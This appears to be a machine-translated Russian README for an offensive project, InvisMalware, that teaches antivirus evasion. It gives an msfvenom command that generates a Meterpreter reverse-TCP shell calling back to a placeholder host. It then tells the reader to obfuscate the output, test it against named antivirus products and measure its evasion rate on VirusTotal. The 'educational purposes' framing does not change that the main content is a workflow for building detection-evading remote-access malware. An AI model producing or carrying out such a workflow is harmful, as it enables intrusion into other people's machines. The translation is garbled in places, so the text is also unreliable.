Invismalware - это проект, предназначенный для демонстрации передовых методов уклонения от вредоносных программ, которые обходят обнаружение антивируса. Этот эксперимент по вредоносному программам, управляемую исследованиями, фокусируется на использовании методов запутывания, таких как модификации кода и стратегии анти-сандбокс, чтобы уклониться от статического и динамического обнаружения вредоносных программ.
Этот проект предназначен только для образовательных целей , предназначенный для того, чтобы дать представление о современных стратегиях обороны вредоносных программ путем изучения методов уклонения, используемых злонамеренными субъектами.
Чтобы начать, клонируйте репозиторий и установите необходимые зависимости.
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalwarepip install -r requirements.txtИспользуйте MSFVVENOM для генерации оборудования обратного TCP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c Измените файл evilexp.c , чтобы запутать код и избежать обнаружения.
Развернуть вредоносное ПО в безопасной изолированной виртуальной машине, чтобы проверить ее поведение и измерения скорости обнаружения.
Загрузите вредоносное ПО в virustotal, чтобы оценить его скорость уклонения по нескольким антивирусным двигателям.
Проект следует четырехэтапной методологии для достижения уклонения от вредоносных программ:
Запустите вредоносное ПО на вашей виртуальной машине, оснащенной антивирусным программным обеспечением, таким как Kaspersky , Windows Defender или BitDefender .
Загрузите модифицированное вредоносное ПО для вирустотального и проверьте, сколько антивирусных двигателей успешно его обнаруживают.
Мы приветствуем вклад в улучшение проекта. Если вы хотите внести свой вклад:
Этот проект лицензирован по лицензии MIT. Смотрите файл лицензии для получения подробной информации.